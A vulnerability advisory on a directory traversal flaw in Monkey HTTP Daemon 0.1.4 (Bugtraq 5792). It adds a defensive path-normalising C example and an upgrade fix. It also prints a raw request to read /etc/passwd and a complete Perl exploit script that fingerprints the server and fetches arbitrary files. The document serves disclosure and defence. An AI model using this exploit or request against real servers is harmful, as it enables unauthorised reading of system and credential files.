
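Monkey HTTP Server file disclosure vulnerability


Published: 2002-09-28
Updated: 2002-09-28
Severity:
Threat level: remote unauthorized file access
Error type: input validation error
Exploitation method: server mode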

BUGTRAQ ID:5792

Affected systems
Monkey Monkey HTTP Daemon 0.1.4
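Detailed description
Monkey is an HTTP server program that supports the HEAD and GET methods.

Monkey does not check HTTP requests containing ../ sequences; by submitting multiple ../ sequences, an attacker can view the contents of arbitrary files on the system.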
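
The missing input check described above, as an added example that is not part of the original advisory and is not Monkey's own code: a lexical path normaliser that refuses any request path whose ../ segments would climb above the document root. The function name resolve_under_docroot and the docroot /var/www are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not Monkey's code: lexically normalise an already
 * percent-decoded request path and map it under docroot. Returns 0 and
 * fills `out`, or -1 if the path would climb above docroot or not fit. */
int resolve_under_docroot(const char *docroot, const char *uri,
                          char *out, size_t outlen)
{
    size_t seg_start[64];   /* offset in `out` where each kept segment begins */
    int depth = 0;
    size_t len = strlen(docroot);

    if (uri[0] != '/' || len + 2 > outlen)
        return -1;
    memcpy(out, docroot, len);
    out[len] = '\0';

    for (const char *p = uri; *p; ) {
        while (*p == '/') p++;                  /* collapse runs such as "//" */
        size_t n = strcspn(p, "/");
        if (n == 0) break;
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0) return -1;          /* ".." would leave docroot */
            len = seg_start[--depth];           /* drop the last kept segment */
            out[len] = '\0';
        } else if (!(n == 1 && p[0] == '.')) {  /* "." is skipped */
            if (depth == 64 || len + n + 2 > outlen) return -1;
            seg_start[depth++] = len;
            out[len++] = '/';
            memcpy(out + len, p, n);
            len += n;
            out[len] = '\0';
        }
        p += n;
    }
    if (depth == 0) { out[len++] = '/'; out[len] = '\0'; }  /* request for "/" */
    return 0;
}

int main(void)
{
    char buf[256];
    /* Request path taken from the advisory's test request; docroot is constructed. */
    int rc = resolve_under_docroot("/var/www", "//../../../../../../../../../etc/passwd",
                                   buf, sizeof buf);
    printf("%s\n", rc == 0 ? buf : "rejected");
    return 0;
}
```

This check is purely lexical and does not follow symbolic links; a server that serves symlinked content should also compare the realpath() of the resolved file against the document root before opening it.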

Test code
GET //../../../../../../../../../etc/passwd HTTP/1.0

---cut here---
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
#    perl monkey.pl <hostname> <httpport> <file>
#
#    <hostname> - target host
#    <httpport> - port on which HTTP daemon is listening
#    <file>     - file which you wanna get
#
# Example:
#    perl monkey.pl www.ii-labs.org 80 /etc/passwd
#  
#                             by DownBload <downbload@hotmail.com>
#                             Illegal Instruction Labs
#
use IO::Socket;

sub sock () {
   $SOCK = IO::Socket::INET->new (PeerAddr => $host,
                          PeerPort => $port,
                      Proto    => "tcp")
   || die "[ ERROR: Can't connect to $host!!! ]\n\n";
}

sub banner() {
  print "[--------------------------------------------------]\n";
  print "[       Monkey-0.1.4 reverse traversal exploit     ]\n";
  print "[        by DownBload <downbload\@hotmail.com>      ]\n";
  print "[             Illegal Instruction Labs             ]\n";
  print "[--------------------------------------------------]\n";
}

if ($#ARGV != 2)
{
  banner();
  print "[ Usage:                                           ]\n";
  print "[    perl monkey.pl <hostname> <httpport> <file>   ]\n";
  print "[--------------------------------------------------]\n";
  exit(0);
}

$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];

banner();
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
while ($a = <$SOCK>) { $line = $line . $a; }
if ($line =~ /Monkey/) { print "[ Monkey HTTP server found, continuing... ]\n"; }
else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
close ($SOCK);

print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ($line = <$SOCK>) { print $line; }
close ($SOCK);
---cut here---

Solution
Upgrade the program:
Monkey Monkey HTTP Daemon 0.1.4:

Monkey Upgrade Monkey HTTP Daemon v0.5
http://monkeyd.sourceforge.net/down.php?vrs=MC41LjA=

Related information
Reference: http://online.securityfocus.com/archive/1/293048
Related homepage: http://monkeyd.sourceforge.net/